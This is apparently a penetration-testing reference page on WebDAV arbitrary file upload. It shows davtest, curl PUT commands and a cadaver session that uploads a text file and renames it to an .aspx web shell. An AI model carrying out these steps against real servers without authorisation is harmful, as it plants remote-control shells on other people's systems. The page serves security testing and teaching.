Table of content

Arbitrary file upload

Davtest can be used to test arbitrary file upload.

davtest -url ${url}

However, sometimes false negative are sent back by the tool, and manual testing can be interesting:

# Upload the ${filename} on the ${filename_url}
curl -X PUT http://${ip}/${filename_url} -d @${filename}

# Test if the upload succeed
curl http://${ip}/${filename_url}

Finaly, cadaver is a framework than can help to work with upload and uploaded files.

# Open the cadaver shell
cadaver http://${ip}/${directory}

# It is possible to upload file with `put`, move directory with `cd` and rename files with `mv`
dav:/${directory}/> cd ..
dav:/> put shell.txt
dav:/> mv shell.txt shell.aspx

The following blog post sumary the attacks: https://null-byte.wonderhowto.com/how-to/exploit-webdav-server-get-shell-0204718/

results matching ""

    No results matching ""

    results matching ""

      No results matching ""